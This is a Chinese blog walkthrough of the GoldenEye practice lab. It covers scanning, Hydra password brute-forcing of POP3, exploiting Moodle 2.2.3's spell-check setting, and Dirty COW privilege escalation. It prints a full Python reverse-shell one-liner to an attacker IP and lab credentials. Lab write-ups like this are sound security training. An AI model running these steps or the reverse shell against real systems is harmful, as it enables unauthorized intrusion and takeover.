前言
最近比较闲,做一做靶场,让我这个菜鸡感受一下自己到底有多菜
靶场地址
发现靶机
信息收集
nmap信息
目录扫描信息
Dirsearch扫描80未发现什么目录
渗透测试
在主页显示/sev-home/目录可以登录
打开目录发现需要凭证
查看页面源码发现有个terminal.js,跟进发现密文和俩人名
密文解密为:
登录进去就发现这个页面(账号密码这卡了好久,后来发现是tm小写,boris/InvincibleHack3r)
根据提示,Hydra爆破pop3服务发现两个账户密码:boris/secret1! ,natalya/bird
google一下可以用telnet,尝试连接pop3,boris里面没啥重要的东西,在natalya里面找到了一个域名和账号密码
根据提示,修改/etc/hosts,指定IP和域名
用上面的给出的账号密码,登录 severnaya-station.com/gnocertdir 后,找到一个消息,里面指出了一个叫doak的运营主管。
再次hydra爆破doak的密码
telnet登录,查看邮件内容:
使用给出的账号密码,登录系统,进去看到一个s3cret.txt的文件
其内容指向一个图片路径
就真的是个图片
在图片属性中有一个base64编码
解出来为
根据上文s3cret.txt的内容,猜测应该是adm1n的密码
结果,吐了,不是adm1n的,是admin的
进去之后没发现啥有用的,看了一下答案说要找cms的漏洞:moodle 2.2.3
Google之后发现metasploit有rce脚本。
需要添加一下密码,域名和目录
试了好几遍失败了,查了资料才知道要改东西
到这个目录里面把拼写引擎改为Pspellshell
浪费大家时间了,又失败了,没找到原因,看了别人的wp,试试另外一个方法
第一步:
在目录下写入python反弹shell的脚本
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.110.128",65530));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
第二步:
将下面改为PspellShell
第三步:
Kali上开启监听
第四步:
在对应Blogs下add a new entry,填点东西,然后点击最后一个ABC的按钮
成功getshell
获取一个tty的shell
内核提权
低权限:
看了一圈suid没发现可以利用的
内核提权吧
先wget一个提权脚本到靶机的tmp目录下
然后执行发现可用脏牛提权cve-2016-5195
把脏牛wget到靶机
编译一下,发现没有gcc,但是有cc
成功获取root
找flag
结束
总结
GoldenEye这个靶场脑洞着实有点大,很多细节点稍有不注意或没想到就会卡很久,这个靶场做下来我大概花了3、4天,其中断过好几次,也有好几次想放弃了,但是坚持一下也做完了,舒服
若有收获,就点个赞吧
0 人点赞
